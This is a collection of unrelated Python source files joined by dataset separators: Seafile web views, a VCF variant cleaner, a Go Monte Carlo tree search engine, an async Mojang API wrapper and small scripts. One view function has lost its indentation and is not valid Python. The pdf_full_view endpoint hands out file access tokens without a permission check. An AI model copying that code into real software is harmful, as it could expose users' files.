        return render_to_response('pubuser.html', {
                'users': users,
                'pubrepos_count': pubrepos_count,
                'groups_count': groups_count,
                'emailusers_count': emailusers_count,
                'current_page': current_page,
                'has_prev': has_prev,
                'has_next': has_next,
                'page_range': page_range,
                }, context_instance=RequestContext(request))
def repo_set_password(request):
    """Ajax endpoint: validate a library-password submission."""
    content_type = 'application/json; charset=utf-8'
    form = RepoPassowrdForm(request.POST)
    if not form.is_valid():
        return HttpResponse(json.dumps({'error': str(form.errors.values()[0])}),
                            status=400, content_type=content_type)
    return HttpResponse(json.dumps({'success': True}), content_type=content_type)
def i18n(request):
    """
    Set client language preference, lasts for one month
    """
    from django.conf import settings
    referer = request.META.get('HTTP_REFERER', None) or settings.SITE_ROOT
    lang = request.GET.get('lang', 'en')

    response = HttpResponseRedirect(referer)
    response.set_cookie(settings.LANGUAGE_COOKIE_NAME, lang, max_age=30*24*60*60)
    return response
def repo_download_dir(request, repo_id):
repo = get_repo(repo_id)
if not repo:
return render_error(request, _(u'Library does not exist'))
path = request.GET.get('p', '/')
if path[-1] != '/': # Normalize dir path
path += '/'
if len(path) > 1:
dirname = os.path.basename(path.rstrip('/')) # Here use `rstrip` to cut out last '/' in path
else:
dirname = repo.name
allow_download = False
fileshare_token = request.GET.get('t', '')
from_shared_link = False
shared_by = None
if fileshare_token: # download dir from dir shared link
try:
fileshare = FileShare.objects.get(token=fileshare_token)
except FileShare.DoesNotExist:
raise Http404
# Can not download upper dir of shared dir.
allow_download = True if path.startswith(fileshare.path) else False
from_shared_link = True
shared_by = fileshare.username
else:
allow_download = True if get_user_permission(request, repo_id) else False
if allow_download:
dir_id = seafserv_threaded_rpc.get_dirid_by_path (repo.head_cmmt_id,
path.encode('utf-8'))
try:
total_size = seafserv_threaded_rpc.get_dir_size(dir_id)
except Exception, e:
logger.error(str(e))
return render_error(request, _(u'Internal Error'))
if total_size > MAX_DOWNLOAD_DIR_SIZE:
return render_error(request, _(u'Unable to download directory "%s": size is too large.') % dirname)
token = seafserv_rpc.web_get_access_token(repo_id,
dir_id,
'download-dir',
request.user.username)
if from_shared_link:
try:
send_message('winguhub.stats', 'dir-download\t%s\t%s\t%s\t%s' % \
(repo_id, shared_by, dir_id, total_size))
except Exception, e:
logger.error('Error when sending dir-download message: %s' % str(e))
pass
else:
return render_error(request, _(u'Unable to download "%s"') % dirname )
url = gen_file_get_url(token, dirname)
return redirect(url)
@login_required
def events(request):
    """Ajax endpoint returning one page of the user's activity feed.

    GET params: start (offset), org_id (cloud mode only).  Responds with
    JSON: rendered html, whether more events may exist, and the next offset.
    """
    if not request.is_ajax():
        raise Http404

    events_count = 15           # page size
    username = request.user.username
    start = int(request.GET.get('start', 0))

    if request.cloud_mode:
        org_id = request.GET.get('org_id')
        events, start = get_org_user_events(org_id, username, start, events_count)
    else:
        events, start = get_user_events(username, start, events_count)
    # A full page implies more events may follow (idiom fix: was
    # `True if len(events) == events_count else False`).
    events_more = len(events) == events_count

    event_groups = group_events_data(events)
    ctx = {'event_groups': event_groups}
    html = render_to_string("snippets/events_body.html", ctx)

    return HttpResponse(json.dumps({'html':html, 'events_more':events_more,
                                    'new_start': start}),
                        content_type='application/json; charset=utf-8')
def group_events_data(events):
    """
    Group events according to the date.

    Annotates each event in-place with ``.time``, ``.author`` and ``.date``,
    then buckets *consecutive* events sharing a calendar date.  Returns a
    list of ``{'date': str, 'events': [event, ...]}`` dicts.
    """
    def utc_to_local(dt):
        # e.timestamp is a datetime.datetime in UTC; convert it to the
        # server's configured timezone for display.
        tz = timezone.get_default_timezone()
        utc = dt.replace(tzinfo=timezone.utc)
        return timezone.make_naive(utc, tz)

    event_groups = []
    for e in events:
        if e.etype == 'repo-update':
            # e.commit.ctime is a unix timestamp
            e.time = datetime.fromtimestamp(int(e.commit.ctime))
            e.author = e.commit.creator_name
        else:
            # Helper hoisted out of the loop (was re-defined every iteration).
            e.time = utc_to_local(e.timestamp)
            e.author = e.creator if e.etype == 'repo-create' else e.repo_owner
        e.date = e.time.strftime("%Y-%m-%d")

        if event_groups and e.date == event_groups[-1]['date']:
            event_groups[-1]['events'].append(e)
        else:
            event_groups.append({'date': e.date, 'events': [e]})

    return event_groups
def pdf_full_view(request):
    '''For pdf view with pdf.js.'''
    repo_id = request.GET.get('repo_id', '')
    obj_id = request.GET.get('obj_id', '')
    file_name = request.GET.get('file_name', '')
    access_token = seafserv_rpc.web_get_access_token(repo_id, obj_id,
                                                     'view', request.user.username)
    return render_to_response('pdf_full_view.html',
                              {'file_src': gen_file_get_url(access_token, file_name)},
                              context_instance=RequestContext(request))
@login_required
def convert_cmmt_desc_link(request):
    """Return user to file/directory page based on the changes in commit.

    GET params: repo_id, cmmt_id, nm (the file/dir name the user clicked in
    the commit description).  The diff of the commit is scanned for an entry
    matching `nm` and the user is redirected accordingly.
    """
    repo_id = request.GET.get('repo_id')
    cmmt_id = request.GET.get('cmmt_id')
    name = request.GET.get('nm')

    repo = get_repo(repo_id)
    if not repo:
        raise Http404

    # perm check
    if get_user_permission(request, repo_id) is None:
        raise Http404

    diff_result = seafserv_threaded_rpc.get_diff(repo_id, '', cmmt_id)
    if not diff_result:
        raise Http404

    for d in diff_result:
        if name not in d.name:
            # skip to next diff_result if file/folder user clicked does not
            # match the diff_result
            continue

        if d.status == 'add' or d.status == 'mod': # Add or modify file
            return HttpResponseRedirect(reverse('repo_view_file', args=[repo_id]) + \
                                            '?p=/%s' % urlquote(d.name))
        elif d.status == 'mov': # Move or Rename file
            return HttpResponseRedirect(reverse('repo_view_file', args=[repo_id]) + \
                                            '?p=/%s' % urlquote(d.new_name))
        elif d.status == 'newdir':
            return HttpResponseRedirect(reverse('repo', args=[repo_id]) + \
                                            '?p=/%s' % urlquote(d.name))
        else:
            continue

    # Should never reach here: a commit description link always names an
    # entry present in that commit's diff.  Log everything for forensics.
    logger.warn('OUT OF CONTROL!')
    logger.warn('repo_id: %s, cmmt_id: %s, name: %s' % (repo_id, cmmt_id, name))
    for d in diff_result:
        logger.warn('diff_result: %s' % (d.__dict__))
    raise Http404
| StarcoderdataPython |
11275814 | <reponame>spiralgenetics/biograph
"""
Given an BioGraph discovery vcf, reduce the graph complexity by removing extra 'noise' in SNP/INDELS that
have PDP==0 and aren't in phase with SVs. Inputs and outputs MUST be sorted.
"""
import sys
import argparse
from collections import defaultdict
import pysam
def parse_args(args):
    """Build the CLI parser and parse *args* (a list of argv tokens)."""
    ap = argparse.ArgumentParser(prog="rvg_cleaner", description=__doc__,
                                 formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("-v", "--variants", metavar="VCF", default="/dev/stdin",
                    help="Input VCF file to parse (%(default)s)")
    ap.add_argument("-o", "--output", metavar="OUT", default="/dev/stdout",
                    help="Output VCF to write (%(default)s)")
    return ap.parse_args(args)
def main(args):
    """
    Main: stream the input VCF and emit only variants that are either SVs,
    directly supported (PDP != 0), or phased (shared PI) with an SV.

    Small variants with PDP == 0 are held in a per-PI backlog; they are
    flushed to the output only if an SV with the same PI appears later on
    the same chromosome, otherwise they are silently dropped.
    Requires input and output to be sorted.
    """
    args = parse_args(args)
    # We can split this by chromosome UNTIL we get inter-chromosomal translocations going
    m_vcf = pysam.VariantFile(args.variants)
    output = pysam.VariantFile(args.output, 'w', header=m_vcf.header.copy()) # pylint: disable=no-member
    backlog = defaultdict(list) # PI: [list of variants we're waiting on]
    known_inphase_lookup = {} # PIs of things to keep
    cur_chrom = None
    for entry in m_vcf:
        if cur_chrom != entry.chrom:
            # New chromosome: phase IDs do not span chromosomes, so reset
            # all state (pending backlog entries are discarded).
            del(backlog)
            del(known_inphase_lookup)
            backlog = defaultdict(list)
            known_inphase_lookup = {}
            cur_chrom = entry.chrom
        m_pi = entry.samples[0]["PI"]
        if "SVLEN" in entry.info:
            # Structural variant: always written.
            output.write(entry)
            # put PI in list of 'always outputs'
            known_inphase_lookup[m_pi] = True
            # flush backlog
            for bent in backlog[m_pi]:
                output.write(bent)
            try:
                # not guaranteed to have a backlog
                del(backlog[m_pi])
            except KeyError:
                pass
        elif entry.samples[0]["PDP"] != 0 or m_pi in known_inphase_lookup:
            output.write(entry)
        else:
            # PDP == 0 and no in-phase SV seen yet: defer until one appears.
            backlog[m_pi].append(entry)
# CLI entry point.
if __name__ == '__main__':
    main(sys.argv[1:])
| StarcoderdataPython |
1656099 | # Create a variable called user_name that captures the user's first name.
# Ask for two names and their months of coding experience, then report
# the combined total in a friendly sentence.
user_name = input("What is your name? ")
friend_name = input("What is your friend's name? ")

months_you_coded = input("How many months have {} been coding? ".format(user_name))
months_friend_coded = input("How many months has {} been coding? ".format(friend_name))

# Prompts return strings; convert before summing.
total_months_coded = int(months_you_coded) + int(months_friend_coded)

print("I am {} and my friend is {}".format(user_name, friend_name))
print("Together we have been coding for {} months!".format(total_months_coded))
| StarcoderdataPython |
1949491 | from tools.utils import create_coco_path_list
# Generate the image/label path list files for the tiny-yolo training data.
# NOTE(review): absolute, machine-specific paths — parameterize before reuse.
create_coco_path_list('/home/zqh/Documents/tiny-yolo-tensorflow/data/images',
                      '/home/zqh/Documents/tiny-yolo-tensorflow/data/labels')
| StarcoderdataPython |
11361389 | #!/usr/bin/env python
import numpy as np
def zero_crossing(image):
    """Stub: zero-crossing edge detection is not yet implemented (returns None)."""
    pass
1943455 | <filename>bokego/mcts.py
from collections import defaultdict
from math import sqrt
import numpy as np
import torch
import torch.multiprocessing as mp
from torch.distributions import dirichlet, categorical
import os
from copy import copy, deepcopy
import bokego.nnet as nnet
from bokego.nnet import ValueNet, PolicyNet, policy_dist
import bokego.go as go
MAX_TURNS = 80
class MCTS:
    '''Monte Carlo tree searcher.
    Nodes are selected with the PUCT variant used in AlphaGo.
    First rollout the tree then choose. To input a move
    use make_move(..) and set_root(..)
    args:
        root (Go_MCTS): node representing current game state
        policy_net (PolicyNet): PolicyNet for getting prior distributions
        value_net (ValueNet): for getting board value (between -1 and 1)
            If no valuenet is given, rewards are based on simulations only
        no_sim (bool): disable simulations and evaluate only with value net
    kwargs:
        expand_thresh (int): number of visits before leaf is expanded (default 100)
        branch_num (int): number of children to expand. If not specified, all legal moves expanded
        exploration_weight (float): scalar for prior prediction (default 4.0)
        value_net_weight (float): scalar between 0 and 1 for mixing value network
                                and simulation rewards (default 0.5)
        noise_weight (float): scalar between 0 and 1 for adding Dirichlet noise (default 0.25)
    Attributes:
        Q: dict containing total simulation rewards of each node
        N: dict containing total visits to each node
        V: dict containing accumulated value of each node
        children: dict containing children of each node
    '''
    # Class-level caches shared by all trees (keyed by board position).
    _dirichlet = dirichlet.Dirichlet(0.1*torch.ones(go.N**2))
    _val_cache = dict()
    _dist_cache = dict()
    _fts_cache = dict()

    def __init__(self, root,
                 policy_net: PolicyNet=None,
                 value_net: ValueNet=None,
                 **kwargs):
        self.Q = defaultdict(int)
        self.N = defaultdict(int)
        self.V = defaultdict(float)
        self.children = dict()
        if policy_net is None:
            # FIX: corrected "keywork" typo in the error message.
            raise TypeError("Missing required keyword argument: 'policy_net'")
        self.policy_net = policy_net
        self.value_net = value_net
        self.no_sim = kwargs.get("no_sim", False)
        if self.value_net is None and self.no_sim:
            raise TypeError("Keyword argument 'value_net' is required for no simulation mode")
        self.expand_thresh = kwargs.get("expand_thresh", 100)
        self.branch_num = kwargs.get("branch_num")
        self.exploration_weight = kwargs.get("exploration_weight", 4.0)
        self.noise_weight = kwargs.get("noise_weight", 0.25)
        if self.no_sim:
            self.value_net_weight = 1.0
        elif self.value_net is None:
            self.value_net_weight = 0.0
        else:
            self.value_net_weight = kwargs.get("value_net_weight", 0.5)
        # for GPU computations
        self.device = kwargs.get("device", torch.device("cpu"))
        policy_net.to(self.device)
        if value_net is not None:
            value_net.to(self.device)
        # initialize the root
        self.set_root(root)

    def __deepcopy__(self, memo):
        cls = self.__class__
        new_tree = cls.__new__(cls)
        new_tree.__dict__.update(self.__dict__)
        # Deep-copy only the mutable search state; nets stay shared.
        new_tree.root = deepcopy(self.root)
        new_tree.V = deepcopy(self.V)
        new_tree.Q = deepcopy(self.Q)
        new_tree.N = deepcopy(self.N)
        new_tree.children = deepcopy(self.children)
        return new_tree

    # For pickling: nets are not picklable/portable, so drop them.
    def __getstate__(self):
        state_dict = self.__dict__.copy()
        del state_dict["policy_net"]
        del state_dict["value_net"]
        return state_dict

    def __setstate__(self, state_dict):
        # BUG FIX: method was named `__setstate_` (missing trailing
        # underscore), so pickle never called it and unpickled trees kept
        # stale node.tree references and an unset policy/value net.
        self.__dict__.update(state_dict)
        # give the nodes a reference to the tree
        for n in self.children:
            n.tree = self
            for c in self.children[n]:
                c.tree = self
        # set the policy net and value net manually
        self.policy_net = None
        self.value_net = None

    def choose(self, node = None):
        '''Choose the best child of root and set it as the new root
        optional:
            node: choose from different node (doesn't affect root)'''
        if node is None:
            node = self.root
        if node._terminal:
            #print(f"{node} Board is terminal")
            return node
        if node not in self.children:
            return node.find_random_child()

        def score(n):
            if self.N[n] == 0:
                return float("-inf") # avoid unseen moves
            return self.N[n]

        # Choose most visited node
        best = max(self.children[node], key=score)
        if node == self.root:
            self.set_root(best)
        return best

    def rollout(self, n = 1, analyze_dict = None):
        '''Do rollouts from the root
        args:
            n (int): number of rollouts
            analyze_dict: (optional) dict to store variations
        '''
        for _ in range(n):
            # Get path to leaf of current search tree
            path = self._descend()
            leaf = path[-1]
            if analyze_dict is not None and len(path) > 2:
                analyze_dict[ path[1] ] = path[1:]
            if not self.no_sim:
                score = self._simulate(leaf, gnu = True)
            else:
                score = None
            self._backpropagate(path, score, leaf.value)

    def set_root(self, node):
        self.root = node
        self.root.tree = self
        self.root._add_noise(self.noise_weight)
        self._expand(self.root)

    def winrate(self, node = None):
        '''Returns float between 0.0 and 1.0 representing winrate
        from perspective of the root
        optional:
            node: return winrate of a different node'''
        w = self.value_net_weight
        if node is None:
            node = self.root
        if self.N[node] > 0:
            # Mix simulation reward and value-net value, then map [-1,1] -> [0,1].
            v = ((1-w)*self.Q[node] + w* self.V[node])/self.N[node]
            return (v+1)/2
        return 0

    def _descend(self):
        "Return a path from root down to leaf via PUCT selection"
        path = [self.root]
        node = self.root
        while True:
            # Is node a leaf?
            if node not in self.children or not self.children[node]:
                if self.N[node] > self.expand_thresh:
                    self._expand(node)
                return path
            node = self._puct_select(node) # descend a layer deeper
            path.append(node)

    def _expand(self, node):
        "Update the `children` dict with the children of `node`"
        if node in self.children:
            return # already expanded
        if self.branch_num:
            self.children[node] = node.find_children(k = self.branch_num)
        else:
            self.children[node] = node.find_children()

    # Need to make this faster (ideally at least 10x)
    def _simulate(self, node, gnu = False):
        '''Returns the reward for a random simulation (to completion) of node
        optional:
            gnu: if True, score with gnugo (default False)'''
        invert_reward = not (node.turn %2 == 0) #invert if it is white's turn
        while True:
            if node._terminal:
                reward = node.reward(gnu)
                if invert_reward:
                    reward = -reward
                return reward
            node = node.find_random_child()

    def _backpropagate(self, path, reward, leaf_val):
        '''Send the reward back up to the ancestors of the leaf'''
        for node in reversed(path):
            self.N[node] += 1
            if reward:
                self.Q[node] += reward
                # Alternate sign: a win for one player is a loss for the parent.
                reward = -reward
            if self.value_net is not None:
                self.V[node] += leaf_val

    def _puct_select(self, node):
        "Select a child of node with PUCT"
        total_visits = sum(self.N[n] for n in self.children[node])
        # First visit selects policy's top choice
        if total_visits == 0:
            total_visits = 1

        def puct(n):
            last_move_prob = node.dist.probs[n.last_move].item()
            avg_reward = 0 if self.N[n] == 0 else \
                    ((1 - self.value_net_weight) * self.Q[n]
                     + self.value_net_weight * self.V[n]) / self.N[n]
            return avg_reward + (self.exploration_weight
                                 * last_move_prob
                                 * sqrt(total_visits) / (1 + self.N[n]))

        return max(self.children[node], key=puct)

    def _prune(self):
        '''Prune the tree leaving only root and its descendants'''
        new_children = defaultdict(int)
        # Breadth-unordered traversal collecting the live subtree.
        q = [self.root]
        while q:
            n = q.pop()
            c = self.children.get(n)
            if c:
                new_children[n] = c
                q.extend(c)
        self.children = new_children
        remove_me = set()
        for n in self.N:
            if n not in new_children:
                remove_me.add(n)
        for n in remove_me:
            del self.Q[n]
            del self.N[n]
            if n in self.V:
                del self.V[n]
class Go_MCTS(go.Game):
"""Wraps go.Game to turn it into a node for search tree expansion
in MCTS. The node acesses policy/value net from its tree.
Implements all abstract methods from Node as well as a few helper
functions for determining if the game is legally finished.
args:
board: the board string
ko: current ko index
last_move: last move index
turn: the turn number (starting from 0)
Attributes:
dist: the policy net's distribution for the game state
value: the value net valuation of the game state
features: the input features for the game state
"""
def __init__(self, board=go.EMPTY_BOARD,
ko=None, turn=0, last_move=None):
super(Go_MCTS,self).__init__(board, ko, last_move, turn)
self._terminal = self.is_game_over()
self.tree = None
def __getstate__(self):
state_dict = {"board": self.board, "last_move": self.last_move,
"ko": self.ko, "turn": self.turn,
"_libs": self._libs, "_hash": self._hash}
return state_dict
def __setstate__(self, state_dict):
_hash = state_dict.pop("_hash")
_libs = state_dict.pop("_libs")
self.__init__(**state_dict)
self._hash = _hash
self._libs = _libs
def __eq__(self, other):
return self.board == other.board and self.ko == other.ko \
and self.last_move == other.last_move
def __hash__(self):
return super(Go_MCTS,self).__hash__()
def __deepcopy__(self, memo):
cls = self.__class__
new_node = cls.__new__(cls)
new_node.__dict__.update(self.__dict__)
for k, v in self.__getstate__().items():
new_node.__dict__[k] = deepcopy(v)
return new_node
def find_children(self, k = None):
'''Find all children of node.
optional:
k: find k children with the top prior probability according to policy'''
if self._terminal:
return set()
if k != None and 0 <= k < go.N**2:
return {self.make_move(i) for i in self.topk_moves(k) if self.is_legal(i)}
return {self.make_move(i) for i in self.get_legal_moves()}
def find_random_child(self):
'''Draws legal move from distribution given by policy.
Returns the board (Go_MCTS object) after the move has been played.'''
if self._terminal:
return self # Game is over; no moves can be made
return self.make_move(self.get_move())
def topk_moves(self, k):
topk = torch.topk(self.dist.probs, k = k).indices
return topk.tolist()
def reward(self, gnu = False):
'''Returns 1 if Black wins, -1 if White wins.
optional:
gnu: score with gnugo'''
if gnu:
reward = go.gnu_score(self)
if reward != None:
return reward
return 1 if self.score() > 0 else -1
def make_move(self, index):
'''Returns a copy of the board (Go_MCTS object) after the move
given by index has been played.'''
game_copy = deepcopy(self)
game_copy.play_move(index)
game_copy._terminal = game_copy.is_game_over()
return game_copy
def get_move(self):
'''Return a move sampled from the policy distribution.
Pass as a last resort.'''
move = self.dist.sample().item()
color = go.BLACK if self.turn%2 == 0 else go.WHITE
tries = 0
while not self.is_legal(move) or go.possible_eye(self.board, move) == color:
if tries >= go.N**2:
return go.PASS
self.dist.probs[move] = 0 #zero out absurd moves
move = self.dist.sample().item()
tries += 1
return move
def is_game_over(self):
    """The game ends when the last move was a pass or MAX_TURNS is exceeded."""
    return self.last_move == go.PASS or self.turn > MAX_TURNS
def _add_noise(self, weight):
    """Blend Dirichlet noise into the policy probabilities (exploration)."""
    dirichlet_sample = MCTS._dirichlet.sample()
    self.dist.probs = (1 - weight) * self.dist.probs + weight * dirichlet_sample
@property
def dist(self):
    """Policy distribution over moves for this position, memoized per node.
    Returns None when the node is not attached to a search tree."""
    if self.tree is None:
        return None
    cached = MCTS._dist_cache.get(self)
    if cached is None:
        cached = policy_dist(self.tree.policy_net,
                             self,
                             fts=self.features,
                             device=self.tree.device)
        MCTS._dist_cache[self] = cached
    return cached
@property
def features(self):
    """Network input features for this position, memoized per node."""
    cached = MCTS._fts_cache.get(self)
    if cached is None:
        cached = nnet.features(self)
        MCTS._fts_cache[self] = cached
    return cached
@property
def value(self):
    """Value-network estimate for this position, memoized per node.
    Returns None when no tree or no value net is available."""
    if self.tree is None or self.tree.value_net is None:
        return None
    cached = MCTS._val_cache.get(self)
    if cached is None:
        cached = nnet.value(self.tree.value_net, self,
                            fts=self.features,
                            device=self.tree.device)
        MCTS._val_cache[self] = cached
    return cached
@property
def winrate(self):
    """Tree-search winrate for this node, or None when detached from a tree."""
    if self.tree is None:
        return None
    return self.tree.winrate(self)
| StarcoderdataPython |
9618475 | from datetime import datetime,timedelta
class templog:
def __init__(self):
f_temps = open('beamformer_temp.log','r')
datetimes_and_temps_raw = f_temps.readlines()
f_temps.close()
self.dt_start = self.todatetime(*(datetimes_and_temps_raw[0].split(',')[0].split()))
self.dt_end = self.todatetime(*(datetimes_and_temps_raw[-1].split(',')[0].split()))
#dt = (self.dt_end - self.dt_start).total_seconds() # only works in python >2.7
self.total_seconds = self.total_seconds_of_timedelta(self.dt_end - self.dt_start)
self.temps = [float(line.split(',')[1]) for line in datetimes_and_temps_raw]
self.num_temps = len(self.temps)
def total_seconds_of_timedelta(self,td):
return td.seconds + td.days * 24 * 3600
def todatetime(self,date_str,time_str):
#return datetime.strptime(datetime_str, "%m/%d/%Y %H:%M:%S") # only works in python >2.5
[month,day,year] = map(int,date_str.split('/'))
[hour,minute,second] = map(int,time_str.split(':'))
return datetime(year,month,day,hour,minute,second)
def get_temp_for_datetime_str(self,date_str,time_str):
desired_dt = self.todatetime(date_str,time_str)
seconds_since_start = self.total_seconds_of_timedelta(desired_dt-self.dt_start)
dt_index = int(float(seconds_since_start)/self.total_seconds*self.num_temps)
return self.temps[dt_index]*9./5+32,seconds_since_start/3600.
| StarcoderdataPython |
11263133 | <reponame>JakeWasChosen/edoC
"""
The MIT License (MIT)
Copyright (c) 2021 https://github.com/summer
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
#THIS IS A MODIFIED VERSION OF summer's wrapper
#This one is async
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright (c) 2021. <NAME> +
# All rights reserved. +
# This file is part of the edoC discord bot project , +
# and is released under the "MIT License Agreement". Please see the LICENSE +
# file that should have been included as part of this package. +
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from ast import literal_eval
from base64 import b64decode
from logging import getLogger
from time import time
from typing import Union, Optional
from .models import UserProfile
from .exceptions import MojangError
from utils.http import session
# THIS IS A MODIFIED VERSION OF summer's wrapper
# This one is async
from ast import literal_eval
from base64 import b64decode
from logging import getLogger
from time import time
from typing import Union, Optional
from utils.http import session
from .exceptions import MojangError
from .models import UserProfile
log = getLogger(__name__)
class MojangAPI:
    """Async wrapper for the public Mojang account / session-server web APIs.

    All methods are class/static methods sharing the module-level ``session``
    from ``utils.http`` (aiohttp-style: responses expose awaitable ``json()``
    and ``text()``).
    """

    # NOTE: Names are held for exactly 37 days after being released.
    # Update this value (by converting days to seconds) if the duration is ever changed.
    _NAME_HOLD_DURATION = 3196800000  # milliseconds

    @classmethod
    async def get_uuid(cls, username: str, timestamp: Optional[int] = None) -> Union[str, None]:
        """Convert a Minecraft name to a UUID.

        Args:
            username: The Minecraft username to be converted.
            timestamp (optional): Get the username's UUID at a specified UNIX timestamp.
                You can also get the username's first UUID by passing 0.
                However, this only works if the name was changed at least once, or if the account is legacy.

        Returns:
            str: The UUID. Otherwise, None if the username does not exist.
        """
        if timestamp is None:
            timestamp_now = int(time() * 1000.0)
            # Look back one name-hold window so recently-freed names still resolve.
            timestamp = int((timestamp_now - cls._NAME_HOLD_DURATION) / 1000)
        resp = await session.get(f"https://api.mojang.com/users/profiles/minecraft/{username}?at={timestamp}")
        if resp.ok:
            try:
                payload = await resp.json()
                return payload["id"]
            except Exception:
                # Non-JSON body or missing key -> treat as "no such user".
                return None
        return None

    @staticmethod
    async def get_uuids(names: list) -> dict:
        """Convert up to 10 usernames to UUIDs in a single network request.

        Args:
            names: The Minecraft username(s) to be converted.
                If more than 10 are included, only the first 10 will be parsed.

        Returns:
            dict: username:uuid pairs of the converted usernames. Names are also case-corrected.
                If a username does not exist, it will not be included in the returned dictionary.
        """
        if len(names) > 10:
            names = names[:10]  # API hard limit: at most 10 names per request
        async with session.post("https://api.mojang.com/profiles/minecraft", data=names) as resp:
            data = await resp.json()
            if not isinstance(data, list):
                if data.get("error"):
                    raise ValueError(data["errorMessage"])
                else:
                    raise MojangError(data)
            sorted_names = dict()
            for name_data in data:
                sorted_names[name_data["name"]] = name_data["id"]
            return sorted_names

    @staticmethod
    async def get_username(uuid: str) -> Union[str, None]:
        """Convert a UUID to a username.

        Args:
            uuid: The Minecraft UUID to be converted to a username.

        Returns:
            str: The username if the UUID exists. None otherwise.
        """
        resp = await session.get(f"https://sessionserver.mojang.com/session/minecraft/profile/{uuid}")
        if resp.ok:
            payload = await resp.json()
            return payload["name"]
        return None

    @classmethod
    async def get_drop_timestamp(cls, username: str) -> Union[int, None]:
        """Get the timestamp of when a username drops.

        Args:
            username: Minecraft name to get drop date of.

        Returns:
            int: The drop timestamp. Otherwise, None if the username is not being released/dropped.
        """
        # FIX: get_uuid is a coroutine and was previously not awaited, so the
        # validity check below could never fail and the URL embedded a
        # coroutine repr instead of the UUID.
        uuid = await cls.get_uuid(username)
        if not uuid:
            raise ValueError("Username is invalid. Failed to convert username to UUID")
        resp = await session.get(f"https://api.mojang.com/user/profiles/{uuid}/names")
        name_changes = [name_change for name_change in reversed(await resp.json())]
        for i, name_info in enumerate(name_changes):
            if name_info["name"].lower() == username.lower():
                try:
                    # NOTE(review): when the match is at i == 0 this reads
                    # name_changes[-1] (the oldest entry) — confirm that
                    # wrap-around is intended.
                    name_changed_timestamp = name_changes[i - 1]["changedToAt"]
                    drop_timestamp = (name_changed_timestamp + cls._NAME_HOLD_DURATION) / 1000
                    return int(drop_timestamp)
                except KeyError:
                    # Previous entry has no change timestamp -> not dropping.
                    return None

    @staticmethod
    async def get_profile(uuid: str) -> Union[UserProfile, None]:
        """Returns a `UserProfile` object, or None if the UUID has no profile.

        `UserProfile` Attributes:
            id (str): UUID of the profile
            name (str): Name of the profile
            cape_url (str or None): URL to the profile's cape
            skin_url (str or None): URL to the profile's skin
            skin_model (str): Skin model of the profile
            is_legacy_profile (bool): Check if the profile is legacy
            timestamp (int): Timestamp of when the profile was retrieved
        """
        resp = await session.get(f"https://sessionserver.mojang.com/session/minecraft/profile/{uuid}")
        try:
            payload = await resp.json()
            # Profile properties are delivered as a base64-encoded dict literal.
            value = payload["properties"][0]["value"]
        except KeyError:
            return None
        user_profile = literal_eval(b64decode(value).decode())
        return UserProfile(user_profile)

    @staticmethod
    async def get_name_history(uuid: str) -> list:
        """Get a user's name history.

        Args:
            uuid: The user's UUID.

        Returns:
            list: A list of dictionaries, each of which contains a name:changed_to_at pair.
                If changed_to_at is set to 0, it is because it is the profile's first name.
        """
        resp = await session.get(f"https://api.mojang.com/user/profiles/{uuid}/names")
        name_history = await resp.json()
        name_data = list()
        for data in name_history:
            name_data_dict = dict()
            name_data_dict["name"] = data["name"]
            if data.get("changedToAt"):
                name_data_dict["changed_to_at"] = data["changedToAt"]
            else:
                name_data_dict["changed_to_at"] = 0  # first/original name
            name_data.append(name_data_dict)
        return name_data

    @staticmethod
    async def get_api_status() -> dict:
        """Get the API / network status of various Mojang services.

        Returns:
            dict: status per service — green (no issues), yellow (some issues),
                red (service unavailable).
        """
        resp = await session.get("https://status.mojang.com/check")
        data = await resp.json()
        servers = dict()
        for server_data in data:
            for k, v in server_data.items():
                servers[k] = v
        return servers

    @staticmethod
    async def get_blocked_servers() -> list:
        """Returns a list of SHA1 hashes of current blacklisted servers that do not follow EULA.

        These servers have to abide by the EULA or be shut down forever. The hashes are not cracked.
        """
        # FIX: previously this awaited `session.get(...).text.splitlines()`,
        # i.e. attribute access on the un-awaited response object, which fails
        # at runtime.  Await the response first, then read its body.
        resp = await session.get("https://sessionserver.mojang.com/blockedservers")
        text = await resp.text()
        return text.splitlines()

    @staticmethod
    async def get_sale_statistics(item_sold_minecraft: bool = True,
                                  prepaid_card_redeemed_minecraft: bool = True,
                                  item_sold_cobalt: bool = False,
                                  item_sold_scrolls: bool = False,
                                  prepaid_card_redeemed_cobalt: bool = False,
                                  item_sold_dungeons: bool = False
                                  ):
        """Get statistics on the sales of Minecraft.

        You will receive a single object corresponding to the sum of sales of
        the requested type(s).  At least one type of sale must be set to True.

        Returns:
            dict: the sales metrics. Keys are `total`, `last24h` and
                `sale_velocity_per_seconds`.
        """
        # The parameter names double as the API's metric keys; locals() here
        # contains exactly the six boolean parameters.
        options = [k for k, v in locals().items() if v]
        if not options:
            raise MojangError("Invalid parameters supplied. Include at least one metric key.")
        resp = await session.post("https://api.mojang.com/orders/statistics", data={"metricKeys": options})
        data = await resp.json()
        metrics = dict()
        metrics["total"] = data["total"]
        metrics["last24h"] = data["last24h"]
        metrics["sale_velocity_per_seconds"] = data["saleVelocityPerSeconds"]
        return metrics
| StarcoderdataPython |
5032411 | <gh_stars>1-10
import json
import pytest
from devtools_testutils import AzureRecordedTestCase, CachedResourceGroupPreparer
from devtools_testutils.aio import recorded_by_proxy_async
from azure.core.credentials import AzureKeyCredential, AzureSasCredential
from azure.eventgrid.aio import EventGridPublisherClient
